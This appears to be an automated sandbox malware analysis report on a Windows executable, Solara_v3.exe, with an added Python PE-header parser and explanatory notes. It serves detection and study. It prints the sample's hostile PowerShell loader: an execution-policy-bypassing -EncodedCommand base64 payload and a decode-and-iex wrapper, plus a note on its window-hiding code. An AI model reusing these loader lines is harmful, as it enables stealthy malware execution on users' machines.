    Source: Solara_v3.exeString found in binary or memory: https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/FileAPI/
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/permissions/#permission-descriptor
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/permissions/#permission-registry
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/permissions/#permissionstatus
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/permissions/#status-of-a-permission
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/user-timing)
    Source: Solara_v3.exeString found in binary or memory: https://wicg.github.io/import-maps/
    Source: Solara_v3.exeString found in binary or memory: https://www.catcert.net/verarrel
    Source: Solara_v3.exeString found in binary or memory: https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml
    Source: Solara_v3.exeString found in binary or memory: https://www.npmjs.com/package/tslib).
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.rapidtables.com/convert/color/hsl-to-rgb.html
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736

    System Summary

Source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution (Author: ditekSHen)
Source: C:\Users\user\Desktop\Solara_v3.exe | File created: C:\WindowsSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B7E3FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B7ED805
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B7ED77C
Source: Solara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
Source: Solara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
Source: Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
Source: Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: $containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
Source: Solara_v3.exe | Binary or memory string: containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
Source: Solara_v3.exe | Binary or memory string: $containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
Source: C:\Users\user\Desktop\Solara_v3.exe | Process created: Commandline size = 3440
Source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution)
Source: classification engine | Classification label: mal80.troj.expl.evad.winEXE@10/10@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t10askbo.sgr.ps1
Source: Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp | Memory string: rustls::msgs::handshakeIllegal SNI hostname received
Source: Solara_v3.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Solara_v3.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Solara_v3.exe | String found in binary or memory: deno test src/v8-flags-help
Source: Solara_v3.exe | String found in binary or memory: Examples: https://github.com/WICG/import-maps#the-import-mapSet V8 command line options (for help: --v8-flags=--help)Watch for file changes and restart process automaticallyWatch for file changes and restart process automatically.
Source: Solara_v3.exe | String found in binary or memory: Multi-address mappings are not yet supported
Source: Solara_v3.exe | String found in binary or memory: For a list of V8 flags, use '--v8-flags=--help'
Source: Solara_v3.exe | String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: Solara_v3.exe | String found in binary or memory: binauthoraboutlong-aboutall-argsunifiedpositionalssubcommandsafter-helpbefore-helpCould not decode tag nameunknown versionunknown authorunknown aboutunknown after-helpunknown before-help
Source: Solara_v3.exe | String found in binary or memory: USAGE:--help
Source: Solara_v3.exe | String found in binary or memory: :Madrid (see current address at www.camerfirma.com/address)1
Source: Solara_v3.exe | String found in binary or memory: Try --help for options
Source: Solara_v3.exe | String found in binary or memory: timer-event-start
Source: Solara_v3.exe | String found in binary or memory: result%lldapicheck-securityshared-librarycurrent-timetimer-event-starttimer-event-endtimer-eventblockbuiltin_hashnewdeletecode-source-infoCOIFS
Source: C:\Users\user\Desktop\Solara_v3.exe | File read: C:\Users\user\Desktop\Solara_v3.exe
Source: unknown | Process created: C:\Users\user\Desktop\Solara_v3.exe "C:\Users\user\Desktop\Solara_v3.exe"
Source: C:\Users\user\Desktop\Solara_v3.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara_v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP"
Source: C:\Users\user\Desktop\Solara_v3.exe | Process created: C:\Windows\System32\attrib.exe "attrib" +h C:\WindowsSystem
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Solara_v3.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Solara_v3.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: Solara_v3.exe | Static file information: File size 33921780 > 1048576
Source: Solara_v3.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1543e00
Source: Solara_v3.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x9f8c00
Source: Solara_v3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Solara_v3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Solara_v3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Solara_v3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Solara_v3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Solara_v3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Solara_v3.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Solara_v3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: n.pdbm!P source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb}!` source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: Solara_v3.exe
    Source: Binary string: m.Core.pdb source: powershell.exe, 00000002.00000002.1735704425.00000141FBE48000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}-H source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.pdb source: powershell.exe, 00000002.00000002.1714210124.00000141E544D000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.pdbhP source: powershell.exe, 00000002.00000002.1714210124.00000141E544D000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 4.0.0.0__b77a5c561934e089\System.Core.pdbF~$ source: powershell.exe, 00000002.00000002.1736252359.00000141FC0BE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\System.Core.pdb source: powershell.exe, 00000002.00000002.1735704425.00000141FBE48000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000002.00000002.1735869418.00000141FBE99000.00000004.00000020.00020000.00000000.sdmp
Source: Solara_v3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Solara_v3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Solara_v3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Solara_v3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Solara_v3.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"
Source: Solara_v3.exe | Static PE information: section name: _RDATA
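The static PE facts above (image base 0x140000000, the HIGH_ENTROPY_VA / DYNAMIC_BASE / NX_COMPAT / TERMINAL_SERVER_AWARE flags, .text and .rdata above 1 MiB, the non-standard _RDATA section name) all come from the PE headers and are cheap to reproduce without a sandbox. The following added example, not part of the Joe Sandbox report, does so with the Python standard library only. Because the 33 MB sample is not embedded here, build_sample_header() constructs a header-only PE32+ carrying the values the report lists; the set of "standard" section names and the 1 MiB threshold are assumptions taken from the report's own wording.

```python
"""Reproduce the report's static PE checks from the headers alone (added example)."""
import struct
from typing import Dict, List

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
# Section names treated as "standard" (assumption; anything else is reported).
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc",
                     ".idata", ".edata", ".tls", ".bss", ".CRT", ".gfids", ".00cfg"}
SIZE_THRESHOLD = 0x100000  # the report's "bigger than" threshold, 1 MiB


def parse_pe(data: bytes) -> Dict:
    """Return machine, image base, DllCharacteristics and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:        # PE32+: 8-byte ImageBase at optional-header offset 24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:      # PE32: 4-byte ImageBase at offset 28 (after BaseOfData)
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in both formats
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name, vsize, _, rawsize, _, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": rawsize, "characteristics": chars})
    return {"machine": machine, "image_base": image_base,
            "dll_characteristics": dll_chars, "sections": sections}


def static_checks(pe: Dict) -> Dict[str, List[str]]:
    """Apply the report's static heuristics; findings are keyed by check name."""
    out = {"high_image_base": [], "dll_characteristics": [],
           "oversized_sections": [], "nonstandard_sections": []}
    if pe["image_base"] > 0x60000000:
        out["high_image_base"].append("0x%x" % pe["image_base"])
    out["dll_characteristics"] = [name for bit, name in sorted(DLL_CHARACTERISTICS.items())
                                  if pe["dll_characteristics"] & bit]
    for s in pe["sections"]:
        if s["raw_size"] > SIZE_THRESHOLD:
            out["oversized_sections"].append(s["name"])
        if s["name"] not in STANDARD_SECTIONS:
            out["nonstandard_sections"].append(s["name"])
    return out


def build_sample_header() -> bytes:
    """Constructed header-only PE32+ with the values the report lists for Solara_v3.exe."""
    dos = (b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, 0xF0, 0x22)
    # Magic, linker ver, SizeOfCode, SizeOfInitData, SizeOfUninitData, EntryPoint, BaseOfCode, ImageBase
    opt = struct.pack("<HBBIIIIIQ", 0x20B, 14, 0, 0x1543E00, 0x9F8C00, 0, 0x1000, 0x1000, 0x140000000)
    # Alignments, versions, SizeOfImage, SizeOfHeaders, CheckSum, Subsystem, DllCharacteristics=0x8160
    opt += struct.pack("<IIHHHHHHIIIIHH", 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x2000000, 0x400, 0, 3, 0x8160)
    opt = opt.ljust(0xF0, b"\0")

    def section(name: bytes, size: int, chars: int) -> bytes:
        return struct.pack("<8sIIIIIIHHI", name, size, 0x1000, size, 0x400, 0, 0, 0, 0, chars)

    secs = (section(b".text", 0x1543E00, 0x60000020)
            + section(b".rdata", 0x9F8C00, 0x40000040)
            + section(b"_RDATA", 0x200, 0x40000040))
    return dos + b"PE\0\0" + coff + opt + secs


if __name__ == "__main__":
    for check, hits in static_checks(parse_pe(build_sample_header())).items():
        print(check, hits)
```

Treat these as weak signals: the PDB path D:\a\deno\deno\target\release\deps\deno.pdb in the strings section says this is a Deno-compiled binary, and such self-contained runtimes are routinely tens of megabytes with multi-megabyte .text and .rdata sections and the full set of modern mitigation flags. The size and section heuristics therefore say little on their own; the verdict in this report rests on the PowerShell/csc.exe chain and the Pastebin C2 string, not on the header layout.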
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B7E36BD push eax; ret 2_2_00007FFD9B7E36F1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (reported 81 times)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4666
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552 | Thread sleep count: 5228 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552 | Thread sleep count: 4666 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: Solara_v3.exe, 00000000.00000003.1750921429.00000203FDFB6000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749034354.00000203FDFA8000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749069863.00000203FDFB5000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1748911495.00000203FDFB5000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000002.1751704223.00000203FDFB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Solara_v3.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Solara_v3.exe | Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_7492.amsi.csv, type: OTHER
Source: C:\Users\user\Desktop\Solara_v3.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\Solara_v3.exe | Process created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"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"}' | ConvertFrom-Json).Script)) | iex
Note on the encoded command below: -EncodedCommand carries base64 over UTF-16LE; decoding it yields the one-liner in the "Base64 decoded" entry, which parses a JSON literal, base64-decodes its Script field as UTF-8 and pipes the result to iex. Decoding that Script field in turn gives a script that checks whether a [Win32] type already exists and otherwise calls Add-Type on a C# class importing GetForegroundWindow and ShowWindow from user32.dll, then defines GetActiveWindowTitle and HideActiveWindow helpers around the foreground window. That Add-Type call is what spawns csc.exe and cvtres.exe and drops py0wfw3n.dll (see the csc.exe entries below); the -ExecutionPolicy Bypass, -NonInteractive and -NoProfile switches are what the "Bypasses PowerShell execution policy" and Sigma signatures key on.
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWA